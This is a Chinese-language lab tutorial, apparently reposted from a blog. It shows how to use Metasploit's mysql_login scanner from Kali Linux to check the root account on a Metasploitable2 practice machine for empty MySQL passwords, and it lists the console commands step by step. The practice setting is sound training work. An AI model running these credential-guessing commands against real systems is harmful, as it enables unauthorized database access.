数据库
首页 > 数据库> > 实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码

实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码

作者:互联网

系列文章目录

实战篇 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码


文章目录


前言

        metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。与VMWare、VirtualBox和其他常见的虚拟化平台兼容。

        Metasploitable 默认 用户名:msfadmin, 密码:msfadmin。登陆之后使用 ip addr 可查看 ip 地址。(查看 IP 的命令很多)

有些新手学了点皮毛耗费大量时间自己去找 IP 做测试,这不仅浪费大量时间,而且很容易被请去小黑屋,有这样一个练手的环境直接去干挺好的,安装靶机也不难,省时省力只是占点内存,网上安装教程也很多。


一、实验环境

一台 Kali - Linux 和 一台 Metasploitable2-Linux 靶机。

我的靶机网络模式设置的是桥接(VMnet0)模式。

二、实验步骤

# 启动数据库:

root@kali:~# systemctl start postgresql

root@kali:~# systemctl enable postgresql #设置成开机启动数据库,我们要经常用

1. kali 启动数据库进入 msf 搜索模块

msfconsole

search mysql_login

2. 加载模块, 配置并设置参数

use auxiliary/scanner/mysql/mysql_login

set rhosts 目标主机IP

set username root    #我们配置要爆破的用户

set blank_passwords true    #开启为所有用户尝试空密码 

show options

3. 配置完成后执行 run  或者 exploit

4. 使用后端凭证命令 creds,列出数据库中的所有凭据

creds

注:如果creds出现错误,可能是postgresql未开启!

例如:

即无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接

标签:实战篇,01,kali,数据库,Linux,msf,靶机,creds
来源: https://blog.csdn.net/weixin_52297942/article/details/122644158